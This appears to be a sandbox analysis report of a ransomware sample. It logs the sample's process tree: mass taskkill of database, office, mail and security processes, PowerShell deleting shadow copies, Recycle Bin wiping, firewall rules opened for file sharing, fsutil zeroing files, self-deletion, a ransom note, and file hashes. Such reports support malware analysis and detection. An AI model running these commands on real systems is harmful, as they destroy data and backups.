C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1332
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1348
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:1792
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:360
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1736
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:900
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
PID:1156
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:848
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
PID:824
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:992
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
PID:1372
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
PID:1344
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1604
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:884
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1608
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1332
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:1108
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES !.hta2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
PID:1372
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:1156
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:1536
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe2⤵
- Deletes itself
PID:2024 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1820
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HOW_TO_RECOVER_MY_FILES !.txt1⤵PID:1908
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\HOW_TO_RECOVER_MY_FILES !.txt1⤵PID:1592
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1d35da07af186a0b8c6cdc47e1978757
SHA1778f198e018a431020d481bc09dd98181c5c55ac
SHA2562561374e559977f3f4f425828d61bf9810c13ec44ec495a15e9f302697438402
SHA5123874fe35fcc406bd0c6be88c2bdb3cd705233c0bc13bd80dc05dcc433067c3114cef5c164f495f7d336d0f8f0e9a0c6cc9aa692dd3c993f98432cf3eda01e721
-
MD5
1d35da07af186a0b8c6cdc47e1978757
SHA1778f198e018a431020d481bc09dd98181c5c55ac
SHA2562561374e559977f3f4f425828d61bf9810c13ec44ec495a15e9f302697438402
SHA5123874fe35fcc406bd0c6be88c2bdb3cd705233c0bc13bd80dc05dcc433067c3114cef5c164f495f7d336d0f8f0e9a0c6cc9aa692dd3c993f98432cf3eda01e721